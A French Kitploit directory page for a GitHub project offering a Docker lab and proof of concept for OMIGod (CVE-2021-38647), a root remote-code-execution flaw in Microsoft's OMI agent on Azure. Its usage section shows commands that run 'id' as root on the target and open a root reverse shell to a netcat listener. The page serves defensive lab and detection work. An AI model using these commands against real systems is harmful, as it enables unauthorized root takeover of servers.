Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-38647-POC-and-Demo-environment — OMIGod / CVE-2021-38647 POC et environnement de démonstration | Kitploit
Outils/GitHubGitHub/simenbai/cve-2021-38647-poc-and-demo-environment
Analyse des VulnérabilitésExploitationTests d'IntrusionSécurité CloudApprentissage et ÉducationLabs et Pratique
GitHubsimenbai/cve-2021-38647-poc-and-demo-environment

CVE-2021-38647-POC-and-Demo-environment

OMIGod / CVE-2021-38647 POC et environnement de démonstration

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
31il y a 4 ansPas encore vérifié

Détails

OMIGod - CVE-2021-38647

Open Management Infrastructure (OMI, anciennement connu sous le nom de NanoWBEM) est un serveur de gestion open source Common Interface Model (CMI) développé par Microsoft et The Open Group. OMI est un agent logiciel présent sur la plupart des VM Linux d'Azure, mais beaucoup ignorent sa présence.

Le 14 septembre, l'équipe Wiz Research a publié un article détaillant quatre vulnérabilités dans OMI. Ces vulnérabilités sont décrites comme faciles à exploiter et peuvent permettre à des attaquants d'exécuter du code arbitraire à distance et d'élever leurs privilèges jusqu'à root avec une seule requête.

Détails de CVE-2021-38647

CVE-2021-38647 est une vulnérabilité RCE non authentifiée exploitée en envoyant une requête HTTP spécialement conçue. CVE-2021-38647 permet à un attaquant d'exécuter des commandes en tant qu'utilisateur de l'agent OMI, normalement root.

Les agents OMI sont largement utilisés sur les serveurs Linux Azure lorsque ces services sont en service :

  • Azure Automation
  • Azure Automatic Update
  • Azure Operations Management Suite
  • Azure Log Analytics
  • Azure Configuration Management
  • Azure Diagnostics

Selon Microsoft, la plupart des services Azure qui utilisent OMI le déploient sans exposer le port HTTP/S.

Objectif de ce projet

Le but de ce projet est de créer un environnement de démonstration facilement reproductible afin que les Blue teams puissent plus facilement trouver des IoC. Pour atteindre cet objectif, je crée une image Docker personnalisée configurée avec la version vulnérable d'OMI.

Utilisation

Selon votre configuration, cela peut nécessiter sudo.

root@kitploit:~
# Building the docker container
docker build . -t omi-god

# Running it
docker run --name=omi-god -it omi-god

Vous aurez maintenant un terminal root pour le conteneur Docker. Vous pouvez obtenir l'adresse IP du conteneur Docker avec la commande :

root@kitploit:~
# Add it to clipboard
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2 | xclip -selection clipboard

# Show it in terminal
docker inspect omi-god | jq ".[0].NetworkSettings.Networks.bridge.IPAddress" | cut -d\" -f2

Une fois ceci configuré, vous pouvez essayer d'exécuter n'importe quel PoC. Pour exécuter celui de ce projet, lancez les commandes suivantes :

root@kitploit:~
# Execute any command as root
python3 omigod.py -t 172.17.0.2 -c id 
 -> uid=0(root) gid=0(root) groups=0(root)

# Get a reverse shell as root on the server
python3 omigod.py -t 172.17.0.2 -r -l 172.17.0.1 -p 4444 & nc -lnvp 4444 

Crédits

La vidéo d'IppSec concernant cette exploitation et la mise en place d'un environnement similaire - https://www.youtube.com/watch?v=TXqi1BKtcyM L'environnement mis en place dans ce projet est basé sur la vidéo d'IppSec.

PoC d'horizon3ai - https://github.com/horizon3ai/CVE-2021-38647 Le PoC de ce projet est basé sur le PoC d'horizon3ai.

Pour plus de détails, consultez le travail des chercheurs d'origine : https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure

Versions affectées

Toutes les versions d'OMI inférieures à v1.6.8-1 sont vulnérables.

Atténuations

Une version corrigée a été publiée pour remédier à cette exploitation. Mettez à jour et assurez-vous que la version est 1.6.8.1 ou supérieure.

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes, sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables de l'utilisation abusive du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil